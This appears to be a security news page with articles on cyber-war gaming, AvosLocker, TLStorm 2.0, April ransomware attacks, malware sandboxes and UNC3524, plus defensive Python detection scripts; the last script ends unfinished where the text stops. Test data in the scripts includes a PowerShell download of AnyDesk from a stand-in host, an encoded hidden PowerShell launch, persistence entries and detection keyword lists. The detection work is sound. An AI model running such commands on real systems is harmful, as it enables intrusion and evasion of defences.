ITSecurity.org

Technology Security Controls

Security

Cyber-war gaming: A cybersecurity tabletop exercise

May 3, 2022

Attackers will inevitably penetrate your defenses. The question is how effectively and quickly your current security and response strategies will perform under attack.

One preparation option is to adapt military war games into cybersecurity tabletop exercises. While cyber-war gaming isn’t a new concept, it’s not widely adopted — yet.

What is a cybersecurity tabletop exercise?

Cyber-war games are designed to provide a real-time look into how a company would defend against and respond to an attack. Red teams use the same tools as attackers to identify weaknesses in a company’s security strategy. The blue team, meanwhile, works to prevent any successful penetration by the red team from getting far into a system.

These tabletop exercises are about more than just penetration testing and trying out attack methodologies, however.

“Because the goal isn’t the same as with a vulnerability scanner or a pen test, it’s not going to be the same; you’re not going to get the same type of results you would get from there,” said Ken Smith, national lead for cyber testing at consulting firm RSM US.

Rather, cyber-war games provide insight into the state of readiness of a company’s cybersecurity strategy and how well security teams would respond to an attack.

Successful cyber-war games involve more than the security team; they pull in members from across the company and are far broader than red teaming or other security exercises. Companies should involve all key stakeholders, from the CEO down to the security teams.

“It’s not only attack and incident response; it’s crisis management,” said Jon Oltsik, analyst at Enterprise Strategy Group, a division of TechTarget. “What would the CEO say if a reporter called? What would you say to customers, to regulators, etc.?” Buy-in from the C-suite is key. Plus, executives need to determine the goal of the assessment beforehand.

How long a war game exercise takes depends on how thorough it’s intended to be. The scope can stretch from a month to six weeks. Each test includes a follow-up report that expands on the results for security teams.

How cyber-war gaming works

Unless the cyber-war game is about testing one specific tactic or aspect of a system, let the red team try whatever they want during the attack.

“Realism is the goal,” Oltsik said. “Use the tactics, techniques and procedures that an adversary might use.”

It’s also important to have a goal for the cyber-war game exercise before putting it into action. “Are you testing new controls that have just been put in place?” Smith said. “Or has your process been entrenched for a while, and you’re looking for a refresher?”

In an exercise, the security teams use a clone of the company’s live environment to get a real-world result. The red team initiates an attack, while the blue team follows existing security strategies to see if it can detect the initial attack. From there, it becomes about which side can employ more creative and effective methods to either further or stop the attack.

Another option is to have IT build a preconfigured environment that neither the red nor the blue team knows about beforehand, as happens at events such as the National Collegiate Cyber Defense Competition. There, blue teams try to work out what the system is and how to secure it before the red teams start their attacks, Smith said.

Consider an organization’s maturity level, resources

Businesses of all sizes conduct cyber-war games, but don’t test just for testing’s sake. Companies must assess their maturity level before attempting one and know what they want out of the exercise.

Companies that do annual pen tests and have two years of solid results show they are ready, Smith said, especially “if you’re doing quarterly vulnerability scans, both internal and external, and you’re not seeing any canary-in-the-coal-mine-type situations.”

Before considering cyber-war gaming, it is also important to take into account if there are infrastructure and personnel in place to conduct, detect and respond to attacks. “If you’re missing any one of those pillars, it doesn’t end up being worth the time and effort,” Smith said.

In that case, outsourcing is an option. Companies don’t have to handle every aspect of cyber-war gaming internally, and it can in fact be beneficial to outsource at least a portion of the exercise.

If your company only has a blue team, for example, it could hire a third party to conduct the attack. Even if your company has the staff and resources to conduct the exercise, consider hiring an outside red and blue team to test against the opposite internal team. Your red team may know how the internal blue team would respond and vice versa, which a third-party attacker probably wouldn’t. This could impact the test and its results.

Challenges of cyber-war gaming

Cyber-war gaming isn’t all roses. Be aware of these potential downsides before conducting an exercise.

Cyber-war gaming isn’t cheap

Conducting an assessment can be expensive. It takes time to devise the scenario, determine the end goal and carry out the exercise, and in some instances the result might not be worth the time and cost. If the blue team stops the red team at the perimeter, you have just conducted a costly pen test. If, on the other hand, the red team walks into the system with next to no resistance, you have paid a lot to learn that your defenses need an overhaul.

“You always run the risk it’s not worth the cost because you’re testing unknowns,” Smith said. “You might not get enough bang for your buck from the exercise. But, if your program is at the right maturity level, you’ve done your due diligence, you have your controls in place and you’re doing regular testing, this is kind of that next step to give you the reassurance of whether or not your processes are working as intended.”

Poor C-suite communications could hurt security teams

The C-suite should be included in cyber-war games, but unfortunately, that’s not always going to happen. Keep the board and C-suite apprised of how tabletop exercises perform, however, and always ensure they understand the purpose of the exercise. Remind them that a successful attack doesn’t mean the blue team failed or people should lose their jobs.

Turning it into a competition

Another concern is that tabletop exercises can become overly competitive. The red team wins more often than not, said Jeff Pollard, analyst at Forrester Research, but that isn’t meant to be an indication of failure by the blue team. Don’t hurt future cooperation by making the exercise a competition between red and blue teams.

“This is when it turns contentious and toxic,” Pollard said.

Purple teaming as an alternative

Organizations may consider using purple teaming instead of cyber-war gaming. This methodology encourages collaboration over competition. Purple teaming involves red teams working alongside blue teams to explain what they would do if they were an attacker. This helps blue teams understand potential attacks and know what to look for in the future.

“Purple teaming is a collaborative effort,” Pollard said. “War gaming can be competitive; there’s a clear ‘winner.’ With purple teaming, you can put the red team next to the blue team and show them what they would do next in an attack.”

Overall, the goal of both exercises is to improve an organization’s defenses, but cyber-war gaming is much broader in scope. In cyber-war gaming, successful red teaming shows a company where its current processes or technology fall short and where work is needed, and it gives the blue team first-hand experience of what a real attack looks like.

Filed Under: Security

Trend Micro discovers AvosLocker can disable antivirus software

Published: 03 May 2022

AvosLocker ransomware is capable of disabling antivirus software to evade detection, according to Trend Micro.

In a blog post Monday, Trend Micro researchers Christopher Ordonez and Alvin Nieto detailed a relatively novel technique that abused a legitimate, signed anti-rootkit driver shipped with Avast’s antivirus product. Not only did the AvosLocker operators use it to get past security software, but they also scanned for endpoints vulnerable to Log4Shell, with the resulting callbacks directed to the group’s command-and-control server.

In both instances, attackers took advantage of previously disclosed vulnerabilities, a recurring concern for enterprises.

AvosLocker is relatively new to the ransomware threat landscape. Trend Micro, as well as Palo Alto Networks, noted its emergence last year may have filled a void left by the shutdown of REvil. Though the observed tactics aligned with previous AvosLocker activity, one significant aspect of the attack did mark a first for the Trend Micro researchers.

“This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (aswArPot.sys),” Ordonez and Nieto wrote in the blog.

Ordonez and Nieto suspect an exploit for Zoho ManageEngine ADSelfService Plus as the initial access vector, based on indications that the actors used the known vulnerability tracked as CVE-2021-40539. The remote code execution bug was initially disclosed last year by security vendor Synacktiv.

With access to Active Directory, the threat actors created a new user account with administrative privileges on the compromised system. They used a PowerShell script to download tooling such as AnyDesk, which provides remote access. The researchers then observed a PowerShell script disabling security products by loading the legitimate Avast Anti-Rootkit driver, which was used to terminate every security-product process it found.

“Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence grows in sophistication. In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products,” Ordonez and Nieto wrote.

Trend Micro said it notified Avast, which confirmed the vulnerability was found in an “old version of its driver aswArPot.sys,” which was fixed in June 2021.

“We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can’t be loaded to memory,” the blog post said. “The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft’s security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.”

Unfortunately, enterprises struggle to keep pace with updates, as highlighted in the report and in recent government alerts. For example, law enforcement agencies from five countries, including the U.S., issued a warning last month on the most commonly exploited bugs of 2021. Both Log4Shell and CVE-2021-40539 were on the list, as they continue to pose a security risk, and threat actors are taking note.

“Similarly to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks,” Ordonez and Nieto wrote.
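The chain the researchers describe above leaves a recognisable sequence in endpoint telemetry. As an added example (not code from Trend Micro or the blog post), the Python below correlates Sysmon-style events per host: a PowerShell download of a remote-access tool, a load of the driver named in the report, and a burst of security-process terminations shortly after. The event records, the 198.51.100.7 download host and the list of security-product process names are constructed for the example; the 30-minute window and the severity levels are assumptions you would tune.

```python
"""Correlating the AvosLocker chain described above in endpoint telemetry:
a PowerShell download of a remote-access tool, a load of the legitimate but
abusable Avast anti-rootkit driver, then bulk termination of security
processes. Event records are constructed for this example (Sysmon-style
fields; they are not Trend Micro's data)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Driver file names known to be abused to kill security tooling. The only
# entry here comes from the report above; extend it from your own intel.
ABUSABLE_DRIVERS = {"aswarpot.sys"}

# Illustrative AV/EDR service process names (Defender, MDE, Trend Micro, Symantec).
SECURITY_PROCESSES = {"msmpeng.exe", "mssense.exe", "tmbmsrv.exe", "ccsvchst.exe"}

# Substrings that mark a download or remote-access tool in a PowerShell command line.
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadfile", "anydesk")


def _base(path):
    """Lower-case file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def analyze_host_events(events, window=timedelta(minutes=30)):
    """Group events per host and return {host: {"findings": [...], "severity": ...}}.

    Severity is "high" when an abusable driver load is followed, within
    `window`, by the termination of at least two security processes.
    """
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)

    results = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: _ts(e["time"]))
        findings, kills, driver_load_at = [], [], None
        for ev in evs:
            eid = ev["event_id"]
            if eid == 1 and _base(ev["image"]) == "powershell.exe":  # process create
                cmd = ev.get("command_line", "").lower()
                if any(m in cmd for m in DOWNLOAD_MARKERS):
                    findings.append(("powershell_download", ev["command_line"]))
            elif eid == 6 and _base(ev["image_loaded"]) in ABUSABLE_DRIVERS:  # driver load
                # The signature is valid: the driver is genuine Avast code, which is
                # exactly why a signature check alone does not stop this technique.
                driver_load_at = _ts(ev["time"])
                findings.append(("abusable_driver_load",
                                 f"{ev['image_loaded']} (signer: {ev.get('signature', 'unknown')})"))
            elif eid == 5 and _base(ev["image"]) in SECURITY_PROCESSES:  # process terminate
                if driver_load_at and _ts(ev["time"]) - driver_load_at <= window:
                    kills.append(_base(ev["image"]))
        if len(kills) >= 2:
            findings.append(("security_process_kill", sorted(set(kills))))
        if findings:
            kinds = {kind for kind, _ in findings}
            high = {"abusable_driver_load", "security_process_kill"} <= kinds
            results[host] = {"findings": findings, "severity": "high" if high else "medium"}
    return results


# Constructed sample telemetry. ws01 shows the full chain; ws02 is a host with
# Avast installed that loads the driver from its normal location (needs triage,
# not an incident); ws03 is benign PowerShell use.
SAMPLE_EVENTS = [
    {"host": "ws01", "time": "2022-04-28 02:10:05", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -ep bypass -c (New-Object Net.WebClient)"
                     ".DownloadFile('http://198.51.100.7/AnyDesk.exe','C:\\Users\\Public\\AnyDesk.exe')"},
    {"host": "ws01", "time": "2022-04-28 02:12:40", "event_id": 6,
     "image_loaded": r"C:\Users\Public\aswArPot.sys", "signature": "Avast Software"},
    {"host": "ws01", "time": "2022-04-28 02:12:41", "event_id": 5,
     "image": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    {"host": "ws01", "time": "2022-04-28 02:12:41", "event_id": 5,
     "image": r"C:\Program Files\Trend Micro\TmBMSrv.exe"},
    {"host": "ws02", "time": "2022-04-28 09:00:00", "event_id": 6,
     "image_loaded": r"C:\Windows\System32\drivers\aswArPot.sys", "signature": "Avast Software"},
    {"host": "ws03", "time": "2022-04-28 09:05:00", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c Get-Process"},
]

if __name__ == "__main__":
    for host, r in analyze_host_events(SAMPLE_EVENTS).items():
        print(host, r["severity"], *r["findings"], sep="\n  ")
```

Because aswArPot.sys is a genuinely signed Avast component, the signer is recorded but deliberately not used to suppress the finding; a load from outside the normal driver directory, as on ws01, is the triage hint. Blocking the old driver at the OS level, as the Avast and Microsoft statements above describe, is the fix; this detection is for hosts that have not received it.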


RCE vulnerabilities found in Avaya, Aruba network switches

Published: 03 May 2022

Five critical vulnerabilities in Aruba and Avaya network switches are capable of remote code execution, according to new Armis research published Tuesday.

IoT security vendor Armis dubbed the series of flaws “TLStorm 2.0” because misuse of the same TLS library, NanoSSL, is the root cause of all of them. All five are rated critical: two (CVE-2022-23677 and CVE-2022-23676) affect Aruba network switches, and three (CVE-2022-29860, CVE-2022-29861 and a third that was not assigned a CVE) affect Avaya switches.

Armis, which discovered the flaws, detailed all five in a technical blog post. The vendor previously discovered the TLStorm series of vulnerabilities, which could be exploited via a malicious TLS packet to ignite APC Smart-UPS devices.

Barak Hadad, head of research in engineering at Armis, wrote in the blog post that TLStorm 2.0 resulted from the discovery that the NanoSSL flaws originally found in TLStorm also affected other vendors.

“The root cause for these vulnerabilities was flaws in NanoSSL library, that were applicable when certain guidelines were not properly followed by the vendor using the library,” Hadad wrote. “The vulnerabilities themselves lay within the glue-logic — the code that glues together the vendor logic and the NanoSSL library. When this code fails to adhere to certain guidelines specified in the NanoSSL manual, an edge case that leads to remote code execution can arise.”

Though the Aruba and Avaya subsets work slightly differently, both allow an attacker to break network segmentation and execute code remotely.

For example, Aruba’s flaws include a memory corruption vulnerability and one that lets an attacker escape a network’s captive portal. Avaya’s, meanwhile, are zero-click vulnerabilities in the web management portal that give the attacker a controllable stack overflow and heap overflow.

One of the Avaya vulnerabilities was not given a CVE because it was found in a discontinued product line. But Hadad noted in his post that “Armis data shows these devices can still be found in the wild.”

Affected Aruba devices include the 5400R, 3810, 2920, 2930F, 2930M, 2530 and 2540 series. In Avaya’s case, the ERS3500, ERS3600, ERS4900 and ERS5900 series are affected by TLStorm 2.0. Patches are available for all affected devices except the discontinued Avaya line.

Hadad told SearchSecurity that it was “not too hard to develop an exploit” for the vulnerabilities, though it depends on the network switch model.

“The exploitability depends on the specific model and specific configuration,” he said. “For example, in the case of the Aruba switches, the user can block the management portal on some of the switch ports and limit the attack surface significantly.”

Armis said in a press release that to the best of its knowledge, there is “no indication” of TLStorm 2.0 flaws being exploited in the wild. A spokesperson for Aruba parent company Hewlett Packard Enterprise likewise told SearchSecurity there was no indication of exploitation.

Avaya did not respond to SearchSecurity’s request for comment.

Alexander Culafi is a writer, journalist and podcaster based in Boston.


April ransomware attacks slam US universities

By Peyton Doyle

Published: 03 May 2022

Ransomware attacks in April began with a burst from one of the most notorious cybercrime gangs and closed with a relative newcomer claiming an attack on one of the world’s largest beverage companies.

While the number of ransomware attacks against targets in the United States appears to have declined since Russia’s invasion of Ukraine, several attacks were still reported and disclosed in April.

Last month, the FBI warned that U.S. agriculture could be more heavily targeted by ransomware attacks aiming to disrupt critical infrastructure. Agriculture was not the only industry that the U.S. government recently showed concern for. On April 20, a joint advisory warned of the “increased” threat of Russian hackers launching cyber attacks against the U.S.

While no ransomware attacks against critical infrastructure were publicly reported or disclosed in April, there were still examples of suspected Russian ransomware gangs hitting the U.S., including several high-profile attacks against universities and colleges.

Higher education targeted

Early in the month, the BlackCat, or ALPHV, group claimed two ransomware attacks, one on April 6 and the other on April 8. The April 6 claim stated that BlackCat was responsible for a March cyber attack on North Carolina A&T State University in Greensboro, N.C. The attack disrupted systems at the university, and the group also claimed to have stolen personal information from both employees and students.

The university acknowledged that it shut down “various systems to contain the incident.” However, director of media relations Jackie Torok said that while the investigation into the incident is ongoing, “multiple investigating agencies have found no current faculty, staff or student data were affected.”

BlackCat two days later claimed it had stolen more than a terabyte of data from Florida International University in Miami. When asked about the incident, an FIU spokesperson told SearchSecurity that the investigation into the attack is still ongoing but that “at this time, we do not believe that any financial information, Social Security numbers, or information on student performance was stored on the impacted server,” and that “this incident has not impacted the education process.”

Those were not the only schools that reported ransomware attacks in April. On April 27, Austin Peay State University in Clarksville, Tenn., posted on its Twitter account: “APSU ALERT: Ransomware attack. THIS IS NOT A TEST. SHUT DOWN ALL COMPUTERS NOW!” According to Clarksville Now, a news outlet that covers the area, the school canceled final exams scheduled for April 28 but resumed them the following Monday. The school also shut off access to its computer labs and told employees not to use their work computers.

In addition to state universities, other public entities were struck by ransomware last month. At the end of the month, Westchester County’s library announced that it was the victim of a ransomware attack, but that personal information did not appear to be compromised.

In mid-April, the computer systems in Wyandotte County, Kansas, were hit by a cyber attack that was later believed to be ransomware. As of May 2, some of the county’s systems were still down. Affected systems included the county’s district attorney, district court, department of motor vehicles and the sheriff’s office.

The attack on Wyandotte County followed a trend of threat actors hitting municipal governments in the U.S. with ransomware. The most notable of 2022 so far was the ransomware attack on Bernalillo County, N.M., in January.

Enterprise attacks

While fewer companies reported ransomware attacks in April, a ransomware gang claimed one major corporation as a victim.

On April 25, the ransomware group Stormous claimed to have stolen 161 gigabytes of data from Coca-Cola and offered to sell the data for a little over $64,000, or 1.65 bitcoin. Stormous reportedly offered to sell portions of the data to any interested parties and would change the cost depending on the amount of data. Coca-Cola has yet to officially confirm this data breach occurred but announced last week that it had begun an investigation into the alleged attack.

During the weekend of April 16, Puerto Rico’s toll system was brought down in a ransomware attack. The entity attacked was a company called Professional Account Management, which provides services for the toll system. Following the attack, government databases, webpages and collection systems for toll plazas shut down. Since the attack, Interior Secretary Noelia Garcia said that some services are back online and no personal data appears to have been breached, but the threat actors are still requesting a ransom to decrypt the rest of the system.

The ransomware attack in Puerto Rico was the first against an entity in the territory this year and the first cyber attack since its Senate was targeted in January.


Why Do You Need a Malware Sandbox?

May 3, 2022

By ANY.RUN Team

Malware sandboxes help solve the problem of identifying previously unknown malware samples. They are protection systems that let you evaluate the safety of software by running it and analyzing its behavior in an isolated virtual environment. This article walks through what a sandbox is and why an organization needs one.

What is a malware sandbox?

A malware sandbox is an established class of security product. Its main tasks are to examine the objects submitted to it, collect the events the object generates (including its network activity) for further analysis, and process the collected data. Each event is checked against configured policies.

A sandbox is an isolated environment to which an object, such as a suspicious file, is sent for analysis. The sandbox collects as much telemetry and context as possible from pre-configured sensors in the network. A sensor can be any existing device or application: a mail gateway, workstation agents, or a firewall that forwards files to the sandbox for inspection. A malware analyst can also upload a file or submit a link for analysis directly.

It is important to examine malware under different conditions, and a sandbox typically supports most operating systems so that it can reveal the malware’s behavior on each. A customized sandbox is also a tool against targeted attacks; how it is customized depends on the user’s priorities.

Why do you need a malware sandbox?

Malicious code cannot always be detected by static analysis. A sandbox lets you detonate a sample and examine how it behaves at run time. The tool helps build protection against any class of malicious object: backdoors, downloaders, banking trojans, ransomware and so on, whether delivered through websites, applications or the operating system. The sandbox is often placed in the DMZ segment, between the perimeter firewall and the core network.

What is the difference between a sandbox and an antivirus?

A malware sandbox dynamically analyzes objects in an isolated network environment with no connection to the company’s network, and lets the object reveal as much of its behavior as possible. Host-based antivirus works the other way around: it aims to block malware and its actions. Antivirus or EDR is the next tier of protection; ideally, the malicious object should never reach the workstation at all.

What types of objects are handled by the sandbox?

These can be links, binaries, Word or Excel files, images, or any custom object type. It is worth noting that there is little value in analyzing files larger than 300 MB; separate, specialized solutions exist for analyzing large files, and that need is rare.

Malicious objects reach the sandbox from several sources, such as firewalls, mail gateways and WAFs, and many standard protocols are supported for the exchange: Syslog, ICAP, SMTP, NFS. A sandbox can also be integrated via an API into almost any environment, so organizations of all kinds can benefit from the tool.

Does the sandbox help protect against an APT attack?

Yes. The sandbox helps defend against advanced persistent threats because it allows events to be analyzed in depth. A malicious object may carry different signatures and bypass antivirus, but its behavior stays roughly the same, and that is what the sandbox shows. One of the main goals is to make the sandbox as attractive to malware as possible so that it exposes as much of itself as possible in a controlled, secure environment. For example, the interactive approach of the ANY.RUN sandbox triggers malware that waits for direct human action: drag the mouse, press keys, create specific files and folders, open documents, do whatever it takes to trick the malware into running.

Of course, you can build your own isolated environment for malware analysis from scratch, but it takes a lot of time and effort to prepare, and there is still a chance that your sandbox will not be secure enough, not invisible enough to malware, or not produce the information you need. To speed things up, we recommend using a ready-made solution such as ANY.RUN. It is an online service, so you can run a sample from anywhere and get results right away.

Specialist qualifications for working with the sandbox

With a well-designed, intuitive interface, a highly qualified operator is not required; sandboxes like ANY.RUN make easy, fast analysis their main advantage. A little experience and a general understanding of cybersecurity processes are enough. Resolving incidents and investigations calls for a higher skill level, but the ANY.RUN service displays all details and information conveniently, so you won’t miss anything when carrying out a complete analysis.

Sandbox reports are transparent and readable (MITRE ATT&CK matrix, screenshots and videos, IOCs, behavioral activity, and so on). The collected information is aggregated and condensed, so the report saves the analyst time.
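To make the report contents above concrete, here is an added example, not ANY.RUN’s code or report format, of what a triage step over such a report can do: walk the process tree, map observed behavior to ATT&CK technique IDs, extract IOCs and produce a verdict. The report structure, the macro-document scenario, the 203.0.113.45 address, the update-cdn.example domain, the placeholder hash and the technique weights are all constructed assumptions.

```python
"""Triage of a dynamic-analysis report: map observed behaviour to ATT&CK
technique IDs, pull out IOCs and produce a verdict. The report layout and its
contents are constructed for this example; this is not ANY.RUN's report
format or verdict logic."""
import ipaddress

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"
RUN_KEY = "\\currentversion\\run"          # also matches RunOnce, same technique
# Weight per technique; the verdict threshold is deliberately simple.
WEIGHTS = {"T1204.002": 2, "T1059.001": 2, "T1027": 2, "T1547.001": 3, "T1071.001": 1}


def _is_ip(s):
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


def _lineage(proc, by_pid):
    """Image names of the process and its ancestors, self first."""
    names = []
    while proc is not None:
        names.append(proc["image"].lower())
        proc = by_pid.get(proc["parent"])
    return names


def triage(report, threshold=5):
    by_pid = {p["pid"]: p for p in report["processes"]}
    hits = {}  # technique id -> first piece of evidence

    for p in report["processes"]:
        img, cmd = p["image"].lower(), p.get("cmdline", "").lower()
        lineage = _lineage(p, by_pid)
        if img in SHELLS and any(a in OFFICE_APPS for a in lineage[1:]):
            hits.setdefault("T1204.002", f"{lineage[-1]} spawned {img}")
            if img in POWERSHELL:
                hits.setdefault("T1059.001", f"PowerShell from Office: {p['cmdline']}")
        # PowerShell accepts abbreviated switches, so " -enc" covers -EncodedCommand too.
        if img in POWERSHELL and " -enc" in cmd:
            hits.setdefault("T1027", "encoded PowerShell command line")
    for f in report.get("files", []):
        if f["op"] == "write" and STARTUP_DIR in f["path"].lower():
            hits.setdefault("T1547.001", f"dropped into Startup folder: {f['path']}")
    for r in report.get("registry", []):
        if r["op"] == "set" and RUN_KEY in r["key"].lower():
            hits.setdefault("T1547.001", f"Run key set: {r['key']}\\{r['value']}")
    net = report.get("network", [])
    for c in net:
        src = by_pid.get(c["pid"])
        if src and src["image"].lower() in SHELLS and c["port"] in (80, 443):
            hits.setdefault("T1071.001", f"{src['image']} -> {c.get('domain') or c['dst']}:{c['port']}")

    iocs = {
        "sha256": report["sample"]["sha256"],
        "ips": sorted({c["dst"] for c in net if _is_ip(c["dst"])}),
        "domains": sorted({c["domain"] for c in net if c.get("domain")}),
        "paths": sorted(f["path"] for f in report.get("files", []) if f["op"] == "write"),
    }
    score = sum(WEIGHTS.get(t, 1) for t in hits)
    verdict = "malicious" if score >= threshold else "suspicious" if score else "clean"
    return {"verdict": verdict, "score": score, "techniques": dict(sorted(hits.items())), "iocs": iocs}


SAMPLE_REPORT = {  # constructed report for a macro document (placeholder hash)
    "sample": {"name": "invoice.docm",
               "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},
    "processes": [
        {"pid": 100, "parent": None, "image": "WINWORD.EXE", "cmdline": "WINWORD.EXE /n invoice.docm"},
        {"pid": 200, "parent": 100, "image": "cmd.exe",
         "cmdline": "cmd /c start /min powershell -w hidden -enc SQBFAFgA"},
        {"pid": 300, "parent": 200, "image": "powershell.exe", "cmdline": "powershell -w hidden -enc SQBFAFgA"},
    ],
    "network": [{"pid": 300, "dst": "203.0.113.45", "port": 443, "domain": "update-cdn.example"}],
    "files": [{"pid": 300, "op": "write",
               "path": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.lnk"}],
    "registry": [{"pid": 300, "op": "set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
                  "value": "svc", "data": r"C:\Users\victim\AppData\Roaming\svc.exe"}],
}
BENIGN_REPORT = {"sample": {"name": "notes.docx", "sha256": "0" * 64},
                 "processes": [{"pid": 100, "parent": None, "image": "WINWORD.EXE",
                                "cmdline": "WINWORD.EXE /n notes.docx"}]}

if __name__ == "__main__":
    for name, rep in (("invoice.docm", SAMPLE_REPORT), ("notes.docx", BENIGN_REPORT)):
        print(name, triage(rep))
```

The technique IDs are real ATT&CK identifiers (User Execution: Malicious File, PowerShell, Obfuscated Files or Information, Registry Run Keys / Startup Folder, Web Protocols); the IOC lists are what you would push to blocklists or hunt with after the verdict.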

Conclusion

A sandbox is one of the most important elements in building corporate infrastructure protection. A modern sandbox not only blocks the spread of a malicious object but also structures a large volume of dynamic-analysis data, passing it to a specialist for further evaluation or, via standard exchange protocols, to other security products.

A malware sandbox works with almost any operating system and device, and using it speeds up both investigation and verdict issuance; on average, a verdict takes a few minutes. The global sandboxing market is growing rapidly and is projected to double within two years. A malware sandbox is an effective service that an organization clearly needs.

About the Author

ANY.RUN is the first interactive online malware analysis sandbox. The service provides detection, analysis and monitoring of cybersecurity threats. Based on its interactive approach to investigations, ANY.RUN lets users interact with the virtual machine by launching programs, changing configurations, rebooting the system and running different scenarios. The user is in full control of the analysis flow in real time. Find out more here: https://any.run/.


Cyberespionage group exploiting network and IoT blind spots

Published: 02 May 2022

A newly uncovered cyberespionage operation is taking advantage of exposed systems that most antimalware and threat detection tools do not cover.

The research team at Mandiant discovered a hacking crew, designated UNC3524, that appears to be acting on behalf of espionage interests by infiltrating networks and eavesdropping on email communications for an extended period of time.

“The high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet set this group apart and emphasize the ‘advanced’ in Advanced Persistent Threat,” Mandiant researchers wrote in a blog post Monday.

“UNC3524 also takes persistence seriously. Each time a victim environment removed their access, the group wasted no time re-compromising the environment with a variety of mechanisms, immediately restarting their data theft campaign.”

What makes the hackers unique, Mandiant said, is the specific devices that they target to gain a foothold on networks. In particular, the crew likes to exploit exposed IoT devices such as webcams and network appliances like SAN arrays and load balancers.

“The threat actor evaded detection by operating from devices in the victim environment’s blind spots, including servers running uncommon versions of Linux and network appliances running opaque OSes,” the blog post said. “These devices and appliances were running versions of operating systems that were unsupported by agent-based security tools, and often had an expected level of network traffic that allowed the attackers to blend in.”

Unlike servers and PCs that are constantly monitored by security tools such as antimalware software and endpoint detection and response products, some IoT devices and network appliances are not carefully monitored. What’s worse, many of the devices operate on old and obscure Linux builds or proprietary closed-source operating systems that are difficult to patch and maintain.

UNC3524 seized on this blind spot to use the devices as a base of operations. Once compromised, an exposed system was used to move laterally to other servers and PCs over hard-to-detect tunneled connections, with the end goal of collecting account credentials for email services, both on-premises and cloud-based.

“The threat actor’s use of the QUIETEXIT tunneler allowed them to largely live off the land, without the need to bring in additional tools, further reducing the opportunity for detection,” noted the Mandiant team. “This allowed UNC3524 to remain undetected in victim environments for, in some cases, upwards of 18 months.”

The blog post noted UNC3524 also used vulnerable conference room cameras, primarily from LifeSize Inc., to create an IoT botnet that served as the backbone of the QUIETEXIT backdoor. Mandiant researchers speculated that the cameras were directly exposed to the internet and most likely compromised through default credentials.

The email accounts were then tapped to collect information on major corporate mergers or financial reports. Mandiant noted that while that sort of inside information would seem to be more indicative of a financial hacking scheme, the extended amount of time the attackers spent on victims’ networks makes it more likely that the operation has the backing of a government intelligence agency.

While Mandiant researchers noted similarities in techniques between UNC3524 and multiple known Russian cyberespionage groups, they could not definitively connect the threat actor to any of those groups.

Because the hackers focused on devices that many antimalware and monitoring tools do not cover, Mandiant recommended that administrators rely instead on their logs to spot unusual activity. Admins can also flag SSH traffic that does not use the standard port 22.

“This traffic should be relatively small, and any findings should be investigated,” the researchers explained. “Organizations can also look for outbound SSH traffic originating from IP addresses that are unknown or not in asset management systems.”
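The two log-based checks described above (SSH on a port other than 22, and outbound SSH from a source address that is not in the asset inventory), worked through as an added example that is not from the Mandiant post or from this article. It assumes Zeek-style connection records in which a protocol-aware sensor fills in a service field independently of the port, plus an asset-management export of known IP addresses; the log lines, the inventory and the RFC 1918 "internal" ranges are all constructed for the example.

```python
"""Flag SSH traffic in network blind spots.

Added example (not from the Mandiant post or the article). Two checks over
Zeek-style connection records:
  1. SSH identified by the sensor on a port other than 22.
  2. Outbound SSH whose internal source address is missing from the asset inventory.
"""
import ipaddress
from dataclasses import dataclass, field
from typing import Iterable, List

# RFC 1918 ranges treated as "inside the organisation" (assumption for this example).
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Constructed asset-management export: addresses of hosts the organisation knows about.
ASSET_INVENTORY = {"10.1.5.20", "10.1.5.30", "10.1.9.44"}

# Constructed, Zeek-style connection records (tab-separated):
# ts, orig_ip, resp_ip, resp_port, service (service as identified by the sensor, not by port).
SAMPLE_CONN_LOG = [
    "1651500000.1\t10.1.5.20\t10.1.5.30\t22\tssh",     # routine internal SSH
    "1651500001.2\t10.1.9.44\t10.1.5.30\t2222\tssh",   # SSH on a non-standard port
    "1651500002.3\t10.1.7.9\t203.0.113.10\t443\tssh",  # outbound SSH on 443, source not in inventory
    "1651500003.4\t10.1.5.20\t198.51.100.7\t22\tssh",  # outbound SSH from an inventoried host
    "1651500004.5\t10.1.7.9\t10.1.5.30\t443\tssl",     # TLS, not SSH; ignored
]


@dataclass
class Finding:
    """One connection record that tripped at least one check."""
    ts: str
    src: str
    dst: str
    dport: int
    reasons: List[str] = field(default_factory=list)


def is_internal(ip: str) -> bool:
    """True when the address falls in one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_conn_line(line: str):
    """Split one tab-separated record into (ts, src, dst, dport, service)."""
    ts, src, dst, dport, service = line.rstrip("\n").split("\t")
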